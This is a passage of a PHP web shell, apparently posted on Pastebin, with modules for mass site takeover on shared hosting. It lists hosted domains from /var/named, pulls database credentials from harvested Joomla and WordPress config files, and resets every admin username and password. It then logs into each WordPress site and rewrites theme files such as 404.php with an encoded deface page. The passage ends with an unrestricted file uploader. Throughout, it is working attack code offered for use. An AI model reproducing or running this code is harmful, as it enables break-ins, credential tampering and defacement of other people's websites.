  643.    color="green">success..</font><br>';
  644.      
  645.                             }else{
  646.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  647.    
  648.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
  649.    
  650.    fail</font></td>';
  651.                             }
  652.                            
  653.                             }
  654.                            
  655.                             #####
  656.                            elseif(preg_match('%mosConfig%',$cnf)){
  657.                             $username=Find($cnf,"\$mosConfig_user = '","'");
  658.                             $password=Find($cnf,"\$mosConfig_password = '","'");
  659.                             $dbname=Find($cnf,"\$mosConfig_db = '","'");
  660.                             $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
  661.                             $site_url = Find($cnf,"\$mailfrom = '","'");
  662.                             $site_url = explode("@",$site_url);
  663.                            
  664.                             $link=mysql_connect("localhost",$username,$password);
  665.                            
  666.                             if ($link)
  667.                             {
  668.                                     $hash = md5($pass);
  669.                                     mysql_select_db($dbname,$link) ;
  670.                                     $tab = $prefix.'users';                
  671.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
  672.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
  673.                                    
  674.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  675.    
  676.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
  677.    
  678.    color="green">success..</font><br>';
  679.      
  680.                             }else{
  681.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  682.    
  683.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
  684.    
  685.    fail</font></td>';
  686.                             }
  687.                            
  688.                             }
  689.                            
  690.                            
  691.                             }
  692.                             #########
  693.                          
  694.                            
  695.                     }
  696.             }
  697.     }
  698.     }
  699.      
  700.      
  701.     break;
  702.      
  703.      
  704.      
  705.      
  706.      
  707.      
  708.      
  709.      
  710.      
  711.      
  712.     ################MASS DEFACE
  713.    case 'wp_def':
  714.      
  715.      
  716.     ################### USER & PASS ################
  717.    $user = 'admin';
  718.     $pass = 'foo';
  719.     ################################################
  720.    
  721.     echo <<<PEE
  722.     <div align="center">
  723.     <form action="" method="POST">
  724.      
  725.     <label>Deface URL: </label> <input type="text" style="width:450px;" name="deface_page"><br />
  726.     <input type="submit" value="DEFACE">
  727.     </form>
  728.      
  729.     PEE;
  730.      
  731.     if($_POST){
  732.     $deface = file_get_contents(trim($_POST['deface_page']));
  733.      
  734.     if(is_readable("/var/named"))
  735.     {
  736.            
  737.             echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
  738.             echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>';
  739.             $list = scandir("/var/named");
  740.             foreach($list as $domain){
  741.             if(strpos($domain,".db"))
  742.             {
  743.                     $domain = str_replace('.db','',$domain);
  744.                     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  745.                     $url = 'http://'.$domain;
  746.                     if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
  747.                     {
  748.                             $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
  749.                            
  750.                             file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
  751.                             ##GET DATABASE INFO FROM CONFIGURATION FILE
  752.                            $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
  753.                             $hostname = Find($cnf,"define('DB_HOST', '","');");
  754.                             $username = Find($cnf,"define('DB_USER', '","');");
  755.                             $password = Find($cnf,"define('DB_PASSWORD', '","');");
  756.                             $dbname = Find($cnf,"define('DB_NAME', '","');");
  757.                             $prefix = Find($cnf,"table_prefix  = '","'");
  758.                            
  759.                             $link=mysql_connect($hostname,$username,$password);
  760.                            
  761.                             if ($link)
  762.                             {
  763.                                     $hash = crypt($pass);
  764.                                     mysql_select_db($dbname,$link) ;
  765.                                     $tab = $prefix.'users';                
  766.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
  767.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
  768.                                     $req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  769.                                     $data = mysql_fetch_array($req);
  770.                                     $site_url=$data["option_value"];
  771.                                    
  772.                                     error_reporting(0);
  773.                                    
  774.                                    
  775.                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  776.    
  777.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="green">[#]
  778.    
  779.    User Pass Changed </font><br>';
  780.                     $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1';
  781.                     $def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."')));
  782.    
  783.    exit; ?>";
  784.                     $buffer0 = CurlPage($site_url.'/wp-login.php',$post);
  785.                    
  786.                     if(!preg_match("/logout/i",$buffer0))
  787.                     {
  788.                             echo "<font color='red'>[X] FAILED TO LOGIN</font><br />";
  789.                     }else{
  790.                     echo "<font color='green'>[#] LOGGED IN :D</font><br>";
  791.                     $urlz = $site_url."/wp-admin/theme-editor.php";
  792.                     $themeditor = CurlPage($urlz,$cookie,null);
  793.                    
  794.                     if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened<br /></td>"; } else { echo "error
  795.    
  796.    opening theme edtitor!</td>"; }
  797.                            
  798.                     $nola = explode(Chr(10),$themeditor);
  799.      
  800.                     foreach($nola as $nline){
  801.                     if(preg_match('%theme-editor\.php\?file=%',$nline) &&
  802.      
  803.     preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  804.                     $modify[Find($nline,'(',')')] = Find($nline,'<a href="','"');
  805.                     }
  806.                     }
  807.                    
  808.                     echo '<td>';
  809.                     if(is_array($modify)){
  810.                     foreach($modify as $met=>$indfile){
  811.                     $nri = str_replace('.','_',$met);
  812.                     $nri = "n".$nri;
  813.                     $indfile =str_replace("&amp;","&",$indfile);
  814.                     $url = trim($site_url."/wp-admin/".$indfile);
  815.                     $themepage = CurlPage($url,"");
  816.                     $_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
  817.                     $_file = Find($themepage,'name="file" value="','"');
  818.                     $nfile = explode('themes',$_file);
  819.                     $jfile = $site_url."/wp-content/themes".end($nfile);
  820.                     //Update file
  821.                     $url = $site_url."/wp-admin/theme-editor.php";
  822.                     $postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  823.                     $themedied = CurlPage($url,$postme);
  824.                     if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  825.                    
  826.                     $theme = Find($themeditor,'<li><a href="theme-editor.php?file=404.php&amp;theme=','">404 Template');
  827.                     if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; }
  828.                     elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";}
  829.                     $theme = trim(str_replace("/","",$theme));
  830.                     $d =  $site_url.'/wp-content/themes/'.$theme.'/404.php';
  831.                     listall("wp.txt",$d.Chr(10));
  832.                     }
  833.             }
  834.                    
  835.                     echo '<a href='.$d.'>LINK</a><br />';
  836.                     echo '</td>';
  837.                    
  838.                     }}
  839.                     ########################END DEFACE#################
  840.    
  841.                             }else{
  842.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  843.    
  844.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">[x]
  845.    
  846.    mysql fail</font></td>';
  847.                             }
  848.                     }}}}}
  849.                            
  850.                    
  851.                    
  852.      
  853.     break;
  854.      
  855.      
  856.      
  857.     // Uploader
  858.     case 'uploader':
  859.      
  860.     echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  861.     echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl"
  862.    
  863.    value="Upload"></form></center>';
  864.     if( $_POST['_upl'] == "Upload" ) {
  865.             if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana"
  866.    
  867.    size="1"><font color="white"> Done !!</font><br>'; }
  868.             else { echo '<font color="#FF0000">Failed :( </font></p>
  869.            </td></table></tr>
  870.    
  871.    '; }
  872.     }
  873.      
  874.      
  875.     }}
  876.     ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!